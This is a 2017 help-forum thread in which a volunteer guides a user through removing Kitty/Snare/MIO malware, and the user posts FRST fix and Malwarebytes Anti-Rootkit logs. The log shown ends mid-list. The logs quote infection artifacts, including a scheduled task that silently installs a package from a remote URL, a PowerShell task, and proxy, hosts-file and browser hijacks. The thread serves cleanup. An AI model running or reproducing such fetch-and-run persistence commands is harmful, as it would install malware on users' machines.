Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Kitty.exe Snare, Mio, etc


  • Please log in to reply
12 replies to this topic

#1 palaboyako

palaboyako

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 28 April 2017 - 10:34 AM

Hello,

 

I have same issue as Sam's on this link: https://www.bleepingcomputer.com/forums/t/644913/kittyexe-virus-snare-winsapsvc-firefox-getting-install-automatically/

 

I have followed the instructions up to running the Farbar.

 

Please find attached log files.

 

Many thanks for helping.

 

 

Attached Files



BC AdBot (Login to Remove)

 


#2 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:09:01 PM

Posted 28 April 2017 - 10:53 AM

Hello
  •   Welcome to Bleeping Computer.
  •   My name is fireman4it and I will be helping you with your Malware problem.

    Please take note of some guidelines for this fix:
  •   Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools.
  •   If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
  •   Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
  •   In the upper right hand corner of the topic you will see a button called Follow This Topic.I suggest you click it and select Immediate E-Mail notification and click on Follow This Topic. This way you will be advised when we respond to your topic and facilitate the cleaning of your machine.
  •   Finally, please reply using the Post button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.
  •   I will be analyzing your log. I will get back to you with instructions.
1.
Download attached fixlist.txt file and save it to the Desktop

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply




2.
Download Malwarebytes Anti-Rootkit Supplement from here

Once you have downloaded the tool (contained in a .zip folder), you will need to extract the contents. We recommend extracting to your desktop.

To extract the files, locate the zipped folder that you want to unzip (extract) files or folders from. To unzip all the contents of the zipped folder, press and hold (or right-click) the folder, select Extract All, and then follow the instructions. Save them on your desktop

After the files are extracted, double-click the mbar.cmd file. If you are unsure which file this is, try double-clicking both files named mbar - only one of them will run.

Update the Database, then click on Next, then on Scan.
  • Let it completes its scan (this can take a while);
  • Once the scan is done, make sure that every item is checked, and click on the Cleanup button (a reboot might be required);
  • After that (and the reboot, if one was required), go back in the mbar folder and look for a text file called mbar-log-TODAY'S-DATE.txt;
  • Copy/paste the content of that log in your next reply;
Things to include in your next reply::
Fixlog.txt
Mbar log
How is the computer running now?

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#3 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 28 April 2017 - 11:34 AM

Thank you.

 

Please find below logs:

 

Fixlog.txt

Fix result of Farbar Recovery Scan Tool (x64) Version: 27-04-2017
Ran by palaboy (28-04-2017 23:57:05) Run:1
Running from C:\Users\palaboy\Downloads\Programs
Loaded Profiles: palaboy (Available Profiles: palaboy)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Task: {C6ADF54B-FBEA-4158-9084-9ECE3282A3C7} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
Task: {EBA0F338-2EB2-4948-8649-F7CDC000C308} - System32\Tasks\SecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe  <==== ATTENTION
Task: {A01FF9B0-E09E-49FB-886A-9BE4C665AE96} - System32\Tasks\Ghuhit => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&amp;d=20170428 /q <==== ATTENTION
Task: {2C0E5301-2AA3-40BA-94AC-64006EFDED95} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-31] () <==== ATTENTION
Task: {400BB117-4F95-4B1E-AA51-B736F5CD79A7} - System32\Tasks\Grgerygugerdom Controls => C:\Program Files (x86)\Kuvolypumole\sernerge.exe
ShellExecuteHooks: No Name - {28CC7F7E-DC67-11E6-B5E0-64006A5CFC23} - C:\Users\palaboy\AppData\Roaming\Muqtainzawge\Anisadom.dll -> No File
ShellExecuteHooks: No Name - {790B50EC-2BBA-11E7-B94C-64006A5CFC23} - C:\Users\palaboy\AppData\Roaming\Njtain\Qugtthine.dll -> No File
C:\Users\palaboy\AppData\Roaming\Muqtainzawge
C:\Users\palaboy\AppData\Roaming\Njtain
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
GroupPolicy: Restriction - Windows Defender <======= ATTENTION
C:\Program Files (x86)\MIO
C:\Program Files (x86)\UCBrowser
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://ph.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms}
SearchScopes: HKLM -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://ph.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://ph.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3175129382-567401783-3479919610-1001 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491943111&z=79425096e61f3a31fd133a2gdzatbgatfz0c6geg0w&from=che0812&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3175129382-567401783-3479919610-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://ph.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wcg_chtengin_17_15&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dph%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyEtDzz0DyD0C0C0D0DtCzyyC0AtB0C0FtN0D0Tzu0StCzytByBtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StCzy0AzzzztCzz0EtGtB0CyDyBtGtC0FtD0BtGtB0BtByEtGyEzzyCyBtD0CyEyC0CzztDyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0BzzyE0FyCtCtAtG0D0EtAyDtGyEtD0DtAtG0BtA0FyEtGyE0AyD0B0CzzyE0C0Ezz0BtD2QtN0A0LzutB%26cr%3D863634034%26a%3Dwcg_chtengin_17_15%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms}
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\316140.js [2017-04-28] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\316140.cfg [2017-04-28] <==== ATTENTION
S2 CuptonySU; "C:\Users\palaboy\AppData\Local\Temp\1\GoogleUpdate.exe" -r [X] <==== ATTENTION
S2 Kitty; C:\Users\palaboy\AppData\Local\Kitty\Kitty.dll [X] <==== ATTENTION
S2 WinSAPSvc; C:\Users\palaboy\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== ATTENTION
C:\Users\palaboy\AppData\Roaming\WinSAPSvc
C:\Users\palaboy\AppData\Local\Kitty
C:\Users\palaboy\AppData\Local\Temp\1
2017-04-28 22:17 - 2017-04-28 22:19 - 00000000 ____D C:\Program Files\MK
2017-04-28 22:17 - 2017-04-28 22:19 - 00000000 ____D C:\Program Files (x86)\AlphaGo
2017-04-28 19:26 - 2017-04-28 20:09 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Njtain
2017-04-28 19:26 - 2017-04-28 19:26 - 00006146 _____ C:\Windows\System32\Tasks\Grgerygugerdom Controls
2017-04-28 19:26 - 2017-04-28 19:26 - 00006072 _____ C:\Windows\System32\Tasks\Ghuhit
2017-04-27 18:32 - 2017-04-28 12:35 - 00000000 ____D C:\Windows\psgo
2017-04-27 18:32 - 2017-04-27 18:32 - 00000000 ____D C:\Users\palaboy\AppData\Local\SNARE
2017-04-27 16:15 - 2017-04-27 16:15 - 00000000 ____D C:\Users\palaboy\Downloads\PPA
C:\Users\palaboy\gotomypc_540.exe
Emptytemp:



*****************

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6ADF54B-FBEA-4158-9084-9ECE3282A3C7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6ADF54B-FBEA-4158-9084-9ECE3282A3C7} => key removed successfully
C:\Windows\System32\Tasks\Windows-PG => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{EBA0F338-2EB2-4948-8649-F7CDC000C308} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EBA0F338-2EB2-4948-8649-F7CDC000C308} => key removed successfully
C:\Windows\System32\Tasks\SecureUpdater => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SecureUpdater => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A01FF9B0-E09E-49FB-886A-9BE4C665AE96} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A01FF9B0-E09E-49FB-886A-9BE4C665AE96} => key removed successfully
C:\Windows\System32\Tasks\Ghuhit => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ghuhit => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C0E5301-2AA3-40BA-94AC-64006EFDED95} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C0E5301-2AA3-40BA-94AC-64006EFDED95} => key removed successfully
C:\Windows\System32\Tasks\Milimili => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{400BB117-4F95-4B1E-AA51-B736F5CD79A7} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{400BB117-4F95-4B1E-AA51-B736F5CD79A7} => key removed successfully
C:\Windows\System32\Tasks\Grgerygugerdom Controls => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Grgerygugerdom Controls => key removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{28CC7F7E-DC67-11E6-B5E0-64006A5CFC23} => value removed successfully
HKCR\CLSID\{28CC7F7E-DC67-11E6-B5E0-64006A5CFC23} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{790B50EC-2BBA-11E7-B94C-64006A5CFC23} => value removed successfully
HKCR\CLSID\{790B50EC-2BBA-11E7-B94C-64006A5CFC23} => key not found.
"C:\Users\palaboy\AppData\Roaming\Muqtainzawge" => not found.
"C:\Users\palaboy\AppData\Roaming\Njtain" => not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avg => key removed successfully
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
"C:\Program Files (x86)\MIO" => not found.
"C:\Program Files (x86)\UCBrowser" => not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key removed successfully
HKCR\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key not found.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key removed successfully
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key removed successfully
HKCR\Wow6432Node\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key removed successfully
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key removed successfully
HKCR\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => key not found.
HKU\S-1-5-21-3175129382-567401783-3479919610-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key removed successfully
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => key not found.
C:\Program Files (x86)\mozilla firefox\defaults\pref\316140.js => moved successfully
C:\Program Files (x86)\mozilla firefox\316140.cfg => moved successfully
HKLM\System\CurrentControlSet\Services\CuptonySU => key removed successfully
CuptonySU => service removed successfully
Kitty => service not found.
WinSAPSvc => service not found.
"C:\Users\palaboy\AppData\Roaming\WinSAPSvc" => not found.
C:\Users\palaboy\AppData\Local\Kitty => moved successfully
"C:\Users\palaboy\AppData\Local\Temp\1" => not found.
"C:\Program Files\MK" => not found.
"C:\Program Files (x86)\AlphaGo" => not found.
"C:\Users\palaboy\AppData\Roaming\Njtain" => not found.
"C:\Windows\System32\Tasks\Grgerygugerdom Controls" => not found.
"C:\Windows\System32\Tasks\Ghuhit" => not found.
C:\Windows\psgo => moved successfully
C:\Users\palaboy\AppData\Local\SNARE => moved successfully
C:\Users\palaboy\Downloads\PPA => moved successfully
C:\Users\palaboy\gotomypc_540.exe => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 295263 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 97287987 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 16275081 B
Edge => 21003640 B
Chrome => 0 B
Firefox => 142308594 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 199458816 B
systemprofile32 => 7824384 B
LocalService => 13930 B
NetworkService => 209132858 B
palaboy => 87414225 B

RecycleBin => 0 B
EmptyTemp: => 744.8 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 23:58:35 ====

 

Mbar.log

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.04.28.07
  rootkit: v2017.04.02.01

Windows 10 x64 NTFS
Internet Explorer 11.306.10586.0
palaboy :: WIN10 [administrator]

29/04/2017 12:06:33 AM
mbar-log-2017-04-29 (00-06-33).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 271479
Time elapsed: 12 minute(s), 50 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 1
C:\ProgramData\Apple\Common\Cloud\WinHelper.dll (Adware.Elex) -> Delete on reboot. [e6919e58d4d478beba5305550df453ad]

Registry Keys Detected: 2
HKLM\SOFTWARE\jhdbca (Adware.Elex) -> Delete on reboot. [3d3a8472faaef83ec461e88bda2643bd]
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\AppleCloudSvc (Adware.Elex) -> Delete on reboot. [0a6dd91dd7d183b3a44263e46f9220e0]

Registry Values Detected: 1
HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\IPHLPSVC\PARAMETERS\PROXYMGR\{C3BFF683-B45B-4501-A87D-F56C7AF4083E}|AutoConfigUrl (Hijack.AutoConfigURL.PrxySvrRST) -> Data: http://web-access.biz/wpad.dat?f19780c295439c0ec98fa18435c7755029825469 -> Delete on reboot. [690ebb3b38702016db947dfe04fd4cb4]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 102
C:\ProgramData\Apple\Common\Cloud\WinHelper.dll (Adware.Elex) -> Delete on reboot. [e6919e58d4d478beba5305550df453ad]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\prefs.js (Adware.Elex) -> Bad: (user_pref("browser.newtab.url", "http://www.initialsite123.com/?z=7d6bf865d98a4370a7728fdg4z5t3c5c0mbb5m3b6q&from=icb&uid=TOSHIBAXDT01ACA100_16U4SBPFSXX16U4SBPFSX&type=hp");) Good: () -> Replace on reboot. [eb8cf9fd2088fb3bd423cbc5a9582dd3]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\prefs.js (Adware.Elex) -> Bad: (f("browser.bookmarks.restore_default_bookmarks", false);
user_p) Good: () -> Replace on reboot. [5f188d69d4d4a195ca2d068ab44d58a8]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\prefs.js (Adware.Elex) -> Bad: (itten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref("accessibility.typeaheadfind", true);
user_pref(") Good: () -> Replace on reboot. [5c1b54a2a107fd391bdcc0d01fe25ca4]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\prefs.js (Adware.Elex) -> Bad: (n is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref("accessibility.typeaheadfind") Good: () -> Replace on reboot. [c9aef600c7e182b454a3b3dd30d10cf4]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\prefs.js (Adware.Elex) -> Bad: (references, you can visit the URL about:config
 */

user_pref("accessibility.typeaheadfind", true);
user_pref("accessibility.typeaheadfind.flashBar", 0);
user_pref("app.update.auto", false);
user_pref("a) Good: () -> Replace on reboot. [5522e0169e0aa393c2355f3100018878]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\prefs.js (Adware.Elex) -> Bad: (hanges will be overwritten when the application exits.
 *
 ) Good: () -> Replace on reboot. [24533db97c2c979fb2457b155ba6cc34]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\prefs.js (Adware.Elex) -> Bad: (pdateTime.browser-cleanup-thumbnails", 1491938378);
user_pref("app.update.lastUpdateTime.experiments-update-timer", 1491938738);
user_pref("app.update.lastUpdateTime.search-engi) Good: () -> Replace on reboot. [f087b34342660a2c6a8d80109b66f40c]
C:\Users\palaboy\AppData\Roaming\Profiles\Mohodom.default\searchplugins\4iy9tnux.xml (Adware.Elex) -> Delete on reboot. [2d4a34c25d4b23137a7cdeb258a9b44c]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (34.195.153.94 469ba60d9681f961064c-3cca6631dac1b4997db921c060b712f6.r30.cf2.rackcdn.com) Good: () -> Replace on reboot. [0e69bf377e2afe3801002f6349b7a858]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (e used by Microsoft TCP/IP for Windows.    
) Good: () -> Replace on reboot. [2c4bd323a8001d190100c4ceab559868]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (osoft Corp.    
#    
# This is a sample HOSTS file) Good: () -> Replace on reboot. [40379f572484e74f8a77cbc7f50b4cb4]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [294e5e98891fac8a9d645a38be42c739]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS file us) Good: () -> Replace on reboot. [b2c5fafc4d5b4fe75aa7f49ed22eb14f]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS file used B) Good: () -> Replace on reboot. [47303abc2484df570cf5c1d1f20e649c]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (p.    
#    
# This is a sample HOSTS file used B) Good: () -> Replace on reboot. [2c4b5f976e3a6dc913ee2969a858d62a]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS f) Good: () -> Replace on reboot. [7dfa43b343657eb8976a0290c43c30d0]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rosoft Corp.    
#    
# This is a sample HOSTS f) Good: () -> Replace on reboot. [017654a2d8d0ec4a926fc1d1ad53a858]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS fil) Good: () -> Replace on reboot. [f186e214822695a140c1b3dfe31d639d]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOSTS fil) Good: () -> Replace on reboot. [bcbb2dc9daceef47728fd1c1b947e11f]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (t Corp.    
#    
# This is a sample HOSTS file ) Good: () -> Replace on reboot. [d1a6be38b5f391a523de603234ccb54b]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (ft Corp.    
#    
# This is a sample HOSTS file u) Good: () -> Replace on reboot. [aec9876fa701ea4c2cd5434f916f1ee2]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: ( Corp.    
#    
# This is a sample HOSTS file used) Good: () -> Replace on reboot. [e39435c18d1be4520ef3395941bfe719]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (Corp.    
#    
# This is a sample HOSTS file used B) Good: () -> Replace on reboot. [b2c512e45553f93d9071731fad53cc34]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (orp.    
#    
# This is a sample HOSTS file used by) Good: () -> Replace on reboot. [1e594bab248459dd31d0d8ba8a7645bb]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (orp.    
#    
# This is a sample HOSTS file u) Good: () -> Replace on reboot. [5e1920d6a305d4623fc298fa1ee22ad6]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (soft Corp.    
#    
# This is a sample HOST) Good: () -> Replace on reboot. [9fd8a353c2e63ff7e021286aa0602dd3]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (rosoft Corp.    
#    
# This is a sample HOSTS file u) Good: () -> Replace on reboot. [ee8941b5426667cf728f038f22def907]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (p.    
#    
# This is a sample HOSTS file ) Good: () -> Replace on reboot. [d2a55a9ccade7db9d62b434f1be5a858]
C:\Windows\System32\drivers\etc\hosts (Hijack.HostFile) -> Bad: (crosoft Corp.    
#    
